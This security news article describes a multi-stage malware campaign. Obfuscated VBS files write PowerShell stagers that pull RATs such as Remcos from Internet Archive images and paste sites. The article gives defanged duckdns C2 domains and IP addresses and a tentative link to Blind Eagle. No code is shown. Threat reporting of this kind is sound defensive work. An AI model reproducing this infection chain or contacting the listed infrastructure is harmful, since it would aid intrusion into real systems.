New Sophisticated Multi-Stage Malware Campaign Uses VBS Files to Execute PowerShell Script

A recently uncovered malware campaign has revealed a highly sophisticated, multi-stage infection process utilizing heavily obfuscated Visual Basic Script (VBS) files to deploy remote access trojans (RATs) such as Remcos, LimeRAT, DCRat, and AsyncRAT.

Discovered across a cluster of 16 open directories on various hosts, this campaign relies on a file named “sostener.vbs” (Spanish for “sustain”) as a key component of its initial payload.

Discovery of a Complex Malware Deployment System

The intricate design of this malware delivery system, which involves a three-stage process of obfuscation, dynamic script generation, and remote payload downloads, highlights the evolving tactics of modern cyber threats.

Researchers have noted potential ties to APT-C-36 (Blind Eagle), a Colombian threat actor known for similar techniques, though definitive attribution remains unconfirmed.

The malware operates through a meticulously crafted three-stage process. In the first stage, the obfuscated VBScript, often found in files like “sostener.vbs”, decodes a Base64-encoded payload and dynamically generates a PowerShell script in memory.

This script, forming the second stage, acts as a stager that reaches out to remote services to download additional malicious components.

These components are often hidden in unconventional locations, such as JPEG images on the Internet Archive or text files on hosting services like paste[.]ee and gofile[.]io.

Technical Breakdown of the Three-Stage Attack

The downloaded elements include a memory injector and the final RAT payload. In the third stage, the injector loads the RAT primarily Remcos, but also variants like LimeRAT and DCRat into memory for execution, granting attackers persistent remote access to compromised systems.

The command-and-control (C2) infrastructure for these RATs predominantly uses “duckdns[.]org” for dynamic DNS, enabling IP rotation to evade detection, with specific domains like “rem25rem[.]duckdns[.]org” and “sosten38999[.]duckdns[.]org” tied to active listeners on rotating IPs.

The campaign’s sophistication is further evident in its use of shared infrastructure, with overlapping C2 servers and TLS certificate fingerprints linking multiple RAT variants to the same threat actors.

For instance, IP addresses like 186[.]169.80.199 and 193[.]23.3.29 have been observed hosting Remcos listeners, while others, such as 213[.]209.150.22, support DCRat operations.

Additionally, an accidental exposure of a personal email (“[email protected]”) in a Bitbucket repository commit log offers a rare glimpse into the potential identity behind the campaign, though this remains unverified.

This malware deployment system, likely the final stage of a broader spearphishing effort, underscores the importance of monitoring open directories and obfuscated scripts to detect such threats early.

Indicators of Compromise (IOCs)

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates